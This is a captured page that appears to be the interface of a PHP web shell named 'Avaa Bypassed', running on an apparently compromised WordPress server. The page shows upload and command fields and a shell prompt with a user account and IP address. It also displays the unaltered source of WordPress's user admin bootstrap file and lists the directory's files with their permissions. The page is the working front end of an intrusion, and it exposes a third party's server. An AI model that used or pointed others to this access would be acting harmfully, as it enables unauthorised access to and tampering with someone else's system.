[ Avaa Bypassed ]




Upload:

Command:

hmhc3928@3.16.50.94: ~ $
<?php
/**
 * WordPress User Administration Bootstrap
 *
 * @package WordPress
 * @subpackage Administration
 * @since 3.1.0
 */

define( 'WP_USER_ADMIN', true );

require_once dirname( __DIR__ ) . '/admin.php';

if ( ! is_multisite() ) {
	wp_redirect( admin_url() );
	exit;
}

$redirect_user_admin_request = ( 0 !== strcasecmp( $current_blog->domain, $current_site->domain ) || 0 !== strcasecmp( $current_blog->path, $current_site->path ) );

/**
 * Filters whether to redirect the request to the User Admin in Multisite.
 *
 * @since 3.2.0
 *
 * @param bool $redirect_user_admin_request Whether the request should be redirected.
 */
$redirect_user_admin_request = apply_filters( 'redirect_user_admin_request', $redirect_user_admin_request );

if ( $redirect_user_admin_request ) {
	wp_redirect( user_admin_url() );
	exit;
}

unset( $redirect_user_admin_request );

Filemanager

Name Type Size Permission Actions
about.php File 257 B 0644
admin.php File 865 B 0644
contribute.php File 267 B 0644
credits.php File 261 B 0644
error_log File 145 B 0644
freedoms.php File 263 B 0644
index.php File 251 B 0644
menu.php File 758 B 0644
privacy.php File 261 B 0644
profile.php File 252 B 0644
user-edit.php File 250 B 0644